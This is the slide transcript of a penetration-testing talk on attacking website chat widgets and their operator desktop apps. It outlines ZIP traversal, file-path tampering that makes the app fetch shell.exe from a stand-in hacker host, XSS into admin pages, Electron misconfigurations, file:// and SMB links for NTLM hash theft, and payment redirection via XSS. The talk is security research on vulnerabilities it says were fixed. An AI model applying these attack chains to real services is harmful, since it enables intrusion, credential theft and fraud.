Chat with a hacker

Transcript

1. Chat with a hacker
   Increase attack surface for Pentest
   A talk by Egor Karbutov and Alexey Pertsev
   

   View Slide

2. • Egor Karbutov & Alexey Pertsev
   • Penetration testers @Digital Security
   • Speakers
   • Bug Hunters
   $ Whoarewe

   2
   

   View Slide

3. • Chats-Chats-Chats
   • How does it works?
   • ZIP old tricks
   • RCE via ZIP
   • So much XSS
   • Electron vulnerability
   • Scheme file:// for your chats
   • Payment through chats
   • Mobile Application Chats
   Agenda
   3
   

   View Slide

4. • Chat images are taken for examples
   • All coincidences are accidental
   Disclaimer
   4
   

   View Slide

5. Chats-Chats-Chats
   • What are you talking about?
   • Another chat?
   5
   

   View Slide

6. Chats-Chats-Chats
   • What are you talking about?
   • Another chat?
   6
   

   View Slide

7. С
   7
   

   View Slide

8. Chat Types
   Social Networks
   CMS
   Desktop Application
   Mobile SDK
   Browsers
   8
   

   View Slide

9. • Increase attack surface
   • Social engineering attacks
   • Vulnerability of own implementations
   • Vendors vulnerability
   • User support is on the local network
   • Lack of segmentation (network)
   Does it help us? Pentest!
   9
   

   View Slide

10. Chat for browsers. How does it works?
    JavaScript
    CMS = JS
    10
    

    View Slide

11. • XML HTTP Request
    • Control of user data
    • Cookie
    • Tokens
    • Sensitive information
    • HTML replace
    • Remote update
    JavaScript «Privileges»
    11
    

    View Slide

12. Services
    12
    

    View Slide

13. Services
    12
    

    View Slide

14. Services
    12
    

    View Slide

15. • Social engineering attacks?
    • Will you send an EXE files?
    • We can use a couple of stupid tricks
    with ZIP
    Files
    13
    

    View Slide

16. 42 Kb
    ZIP Bomb
    24 Gb?
    322 Gb?
    132 Tb?
    4.5 Pb
    Hi @sergeybelove
    from 2014 :)
    14
    

    View Slide

17. ZIP Format
    15
    

    View Slide

18. ZIP Traversal
    16
    

    View Slide

19. Let’s send a file
    storage.servise.test
    api.servise.test
    User interface
    Operator standalone program
    17
    

    View Slide

20. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    User interface
    Operator standalone program
    17
    

    View Slide

21. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    17
    

    View Slide

22. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17
    

    View Slide

23. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17
    

    View Slide

24. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17
    

    View Slide

25. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17
    

    View Slide

26. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test
    %Downloads%/cat.png
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17
    

    View Slide

27. RCE via File
    api.servise.test
    User interface
    Operator standalone program
    18
    

    View Slide

28. RCE via File
    api.servise.test
    Sending the file
    cat.png
    User interface
    Operator standalone program
    18
    

    View Slide

29. RCE via File
    api.servise.test
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18
    

    View Slide

30. RCE via File
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18
    

    View Slide

31. RCE via File
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18
    

    View Slide

32. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18
    

    View Slide

33. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18
    

    View Slide

34. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test.hacke.site
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18
    

    View Slide

35. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test.hacke.site
    %Downloads%/shell.exe
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18
    

    View Slide

36. • XSS is the maximum impact
    • High level of message security
    • Not obvious places
    • Headers
    • GET/POST parameters for analytics
    • Our target is Admin page or statistic page
    XSS
    19
    

    View Slide

37. • User-Agent
    • Referrer
    • Cookie
    • Origin
    • Custom Headers
    Headers for XSS
    20
    

    View Slide

38. • Methods
    • GET
    • POST
    • WebSocket
    Parameters for XSS
    21
    Keep it simple. Use gray box
    analysis!
    

    View Slide

39. • Waiting for someone to visit this page
    • Abuse of complaints against administrators
    Admin & Statistic Page
    22
    

    View Slide

40. The sad consequences
    • XSS into chat settings
    • Appearance customisation
    • Fonts
    • Labels
    • Color
    • Image
    • etc
    23
    

    View Slide

41. Attack scheme №1
    pentest_client.shop.test
    Evil Hacker
    24
    

    View Slide

42. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    24
    

    View Slide

43. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

44. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

45. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

46. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

47. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

48. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    pentest_client.shop.test
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24
    

    View Slide

49. Attack scheme №2
    Evil Hacker
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

50. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

51. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

52. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

53. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

54. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25
    

    View Slide

55. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    chat.vendor
    25
    

    View Slide

56. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    XSS from any
    user on
    chat clients
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    chat.vendor
    25
    

    View Slide

57. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    XSS from any
    user on
    chat clients
    statistic.chat.vendor
    admin.chat.vendor
    statistic_vendor.chat.test
    admin_vendor.chat.test
    chat.test
    All chat clients services
    chat.vendor
    chat.vendor
    25
    

    View Slide

58. Electron
    • OpenSource framework to build desktop
    apps using HTML, CSS and JavaScript
    • Electron accomplishes this by combining
    Chromium and Node.js into a single
    runtime
    • Chats vendor use Electron for admin
    desktop applications
    26
    

    View Slide

59. • Electron Threat Model = Browser Threat Model
    • Untrusted content from the web
    • SOP Bypass
    • Control whether access to Node.js primitives is allowed from
    JavaScript
    • Potential access to Node.js primitives
    • Limited sandbox
    • XSS == RCE
    Electron Threat Model
    https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
    https://blog.doyensec.com/2017/08/03/electron-framework-security.html
    27
    

    View Slide

60. • nodeIntegration = true
    Electron sandbox bypass
    Electron 1.6.7
    28
    

    View Slide

61. • nodeIntegration = true
    • Misconfiguration
    • SOP bypass via presence of privileged URLs
    • Switch false
    Electron sandbox bypass
    29
    

    View Slide

62. • Typically used to retrieve files from networks and local disks
    • Vulnerability in the wild
    • Local File Inclusion
    • XXE
    • SSRF
    • Windows context
    • NTLM Hash Stealing
    • NTLM Relay
    • RCE
    File://
    30
    

    View Slide

63. • Admin desktop application for Windows
    • Available scheme file://
    • Scheme file:// like hyperlink
    Chats with File://
    31
    

    View Slide

64. Chats with File://
    pentest_client.shop.test Admin desktop application
    Send NTLM hash
    Send file:// link
    file://hacker.test/
    Hacker SMB
    Hash Cracking
    SMB Relay
    • Pentest in local network
    • RCE on client device and servers
    • Weakness & duplicate passwords (local services, servers, client
    devices)
    32
    

    View Slide

65. • What can we do?
    • File:// with local files
    • file://C:/Windows/System32/calc.exe
    Tricks with File:// №1
    • But we can’t use arguments
    file://C:/Windows/System32/cmd.exe /C calc
    • All symbols in file link is a path
    • It is only for social engineering attacks
    • You can combine this with dir traversal ZIP trick
    33
    

    View Slide

66. • File:// with execute files from the Internet (Hacker SMB server)
    • file://internet_IP/pwn.exe
    Tricks with File:// №2
    34
    

    View Slide

67. Chats with File://
    pentest_client.shop.test
    Admin desktop application
    Download
    shell.exe
    Send file:// link

    on execute file
    file://hacker.test/shell.exe
    Hacker SMB
    • Pentest internet service and local network
    • RCE on client device
    • Social engineering attacks + file://local_files
    Clicking on the link
    Admin OS
    Executing
    shell.exe
    35
    

    View Slide

68. • How to bypass Windows alert window?
    • “This file is in a location outside your local network”
    • Easy, I’ll use local addresses
    • 10.0.0.0—10.255.255.255
    • 172.16.0.0—172.31.255.255
    • 192.168.0.0—192.168.255.255
    • No, it isn’t work
    Tricks with File:// №3
    36
    

    View Slide

69. • “Local network” from OS Windows is servers with NetBios name
    • NetBios name - Domain names without dot
    • If I’ll use NetBios name “netbios” instead of “local IP”, I can bypass
    that alert
    • file://netbios/pwn.exe
    • How?
    • Smbd (samba) server + responder –d netbios –I eth0
    • Working only in local networks
    Tricks with File:// №3
    37
    

    View Slide

70. Chats with File://
    • NetBios name trick in local network
    • Without alert window
    pentest_client.shop.test Admin desktop application
    Send file:// link

    on execute file
    file://netbios/pwn.exe
    Hacker SMB
    Clicking on the link
    Admin OS
    Download
    shell.exe
    Executing
    shell.exe
    38
    

    View Slide

71. Add payment system
    Useful?
    Be careful to store a configs!
    39
    

    View Slide

72. Hacker can buy IPhone for free
    40
    Shop backend
    

    View Slide

73. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    40
    Shop backend
    

    View Slide

74. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    40
    Shop backend
    

    View Slide

75. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    40
    Shop backend
    

    View Slide

76. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    Evil Hacker
    40
    Shop backend
    

    View Slide

77. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    Evil Hacker
    avisoURL
    IPhone
    X
    40
    Shop backend
    

    View Slide

78. Stealing money for hackers
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Steps to take profit:
    • Register own shop with similar name
    • Change shopId via XSS
    • Call checkURL and avisoURL as needed
    • All payments for hackers !
    Protection:
    • Check Yandex Ips
    • Add anti-CSRF token for config form
    • DO NOT SHOW ANY PASSWORDS EVER
    41
    

    View Slide

79. • Custom code for native applications
    • All code have only one privileges in Mobile OS
    • 3rd party applications have full access in your app
    • Change the user interface
    • Access to local files in folder app
    • Access to dynamic user data
    • Change logic app (like tapjacking)
    • Vulnerability
    • Custom implementation
    • WebView JS manipulation (Android)
    Mobile Application SDK
    https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
    42
    

    View Slide

80. • ExpensiveWall is spread to different apps as an SDK called
    “gtk,”
    • ExpensiveWall sends data about the infected device to its C&C
    server, including its location and unique identifiers, such as
    MAC and IP addresses, IMSI, and IMEI.
    • Total Downloads infected applications = 5,904,511
    ExpensiveWall
    https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
    43
    

    View Slide

81. • Farms that overestimate the rating of applications
    • Dynamic code execution and code update
    • JSPatch iOS
    • Android Runtime
    • Valid Ad that were vulnerable
    • Application with fake (Ad) SDK
    • Code review custom SDK code
    Don’t forget about
    44
    

    View Slide

82. • For pentest and red team
    • Increase your attack surface via 3rd party services and program library
    • For you and your project
    • Think how much you trust other people’s implementations,
    applications in your devices, plugins in your program
    • Don’t forget about code review!
    • All vulnerability are reported and fixed
    Conclusion
    45
    

    View Slide

83. Questions? Or
    @ShikariSenpai @_p4lex
    Egor Karbutov
    Alexey Pertsev
    Special THX to @cherboff and @barracud4_
    

    View Slide